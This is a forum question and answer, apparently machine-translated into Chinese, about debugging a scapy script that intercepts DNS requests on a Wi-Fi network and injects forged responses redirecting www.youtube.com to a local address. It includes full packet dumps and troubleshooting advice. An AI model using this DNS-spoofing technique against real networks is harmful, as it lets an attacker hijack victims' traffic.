我使用scapy拦截DNS请求并伪造响应。拦截和锻造部件工作正常,似乎伪造数据包的发送工作(至少我可以看到指示sendp功能成功的点)。但是,在目标站上我没有收到数据包 - 或者我没有在Wireshark上看到它。
我不知道我的问题在哪里,但我猜它不在DNS / UDP部分(该数据包在Wireshark中可见)。所以它可能在802.11或IP层。
这是一个请求:
192.168.2.117 (a4:4e:31:5c:54:78) -> 194.2.0.50 (00:14:d1:ad:9f:88)
DNS request for www.youtube.com.
###[ RadioTap dummy ]###
version = 0
pad = 0
len = 38
present = TSFT+Flags+Rate+Channel+dBm_AntSignal+b14+b29+Ext
notdecoded= ' \x08\x00\xa0 \x08\x00\x00\xc8+\xa3\x10\x00\x00\x00\x00\x10l\x9e\t\xc0\x00\xd5\x00\x00\x00\xcd\x00\xd4\x01'
###[ 802.11 ]###
subtype = 8L
type = Data
proto = 0L
FCfield = to-DS
ID = 11264
addr1 = 00:14:d1:ad:9f:88
addr2 = a4:4e:31:5c:54:78
addr3 = 00:25:9c:9a:aa:b1
SC = 4272
addr4 = None
###[ 802.11 QoS ]###
TID = 0L
EOSP = 0L
Ack Policy= 0L
Reserved = 0L
TXOP = 0
###[ LLC ]###
dsap = 0xaa
ssap = 0xaa
ctrl = 3
###[ SNAP ]###
OUI = 0x0
code = 0x800
###[ IP ]###
version = 4L
ihl = 5L
tos = 0x0
len = 61
id = 213
flags =
frag = 0L
ttl = 128
proto = udp
chksum = 0xb489
src = 192.168.2.117
dst = 194.2.0.50
\options \
###[ UDP ]###
sport = 50648
dport = domain
len = 41
chksum = 0x7b3c
###[ DNS ]###
id = 64118
qr = 0L
opcode = QUERY
aa = 0L
tc = 0L
rd = 1L
ra = 0L
z = 0L
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'www.youtube.com.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None
###[ Padding ]###
load = '\xb2\x17\xa3\x8a'
伪造的回应:
###[ RadioTap dummy ]###
version = 0
pad = 0
len = 38
present = TSFT+Flags+Rate+Channel+dBm_AntSignal+b14+b29+Ext
notdecoded= ' \x08\x00\xa0 \x08\x00\x00\xc8+\xa3\x10\x00\x00\x00\x00\x10l\x9e\t\xc0\x00\xd5\x00\x00\x00\xcd\x00\xd4\x01'
###[ 802.11 ]###
subtype = 8L
type = Data
proto = 0L
FCfield = from-DS
ID = 11264
addr1 = a4:4e:31:5c:54:78
addr2 = 00:14:d1:ad:9f:88
addr3 = 00:25:9c:9a:aa:b1
SC = 14272
addr4 = None
###[ 802.11 QoS ]###
TID = 0L
EOSP = 0L
Ack Policy= 0L
Reserved = 0L
TXOP = 0
###[ LLC ]###
dsap = 0xaa
ssap = 0xaa
ctrl = 3
###[ SNAP ]###
OUI = 0x0
code = 0x800
###[ IP ]###
version = 4L
ihl = 5L
tos = 0x0
len = None
id = 213
flags =
frag = 0L
ttl = 128
proto = udp
chksum = None
src = 194.2.0.50
dst = 192.168.2.117
\options \
###[ UDP ]###
sport = domain
dport = 50648
len = None
chksum = None
###[ DNS ]###
id = 64118
qr = 1L
opcode = QUERY
aa = 0L
tc = 0L
rd = 1L
ra = 1L
z = 0L
rcode = ok
qdcount = 1
ancount = 1
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'www.youtube.com.'
| qtype = A
| qclass = IN
\an \
|###[ DNS Resource Record ]###
| rrname = 'www.youtube.com.'
| type = A
| rclass = IN
| ttl = 900
| rdlen = 4
| rdata = '192.168.2.100'
ns = None
ar = None
###[ Padding ]###
load = '\xb2\x17\xa3\x8a'
我尝试使用有效的DNS响应进行检查,但我没有看到解释我的问题的任何差异。我尝试修改ID和SC字段,但它不会改变任何内容。 addr3不会改变。
您是否看到错误解释目标未收到的原因?
答案 0 :(得分:0)
嗯,你的IP响应的长度是'无'。这在处理上不会很好。 :)这是显而易见的事情。此外,即使您添加了数据,您在顶部的总长度也不会改变。
我不确定sport / dport = domain是什么意思;我假设那些是53号港口。
查询/响应中的IP ID字段通常应该不同,但这不会影响您的结果。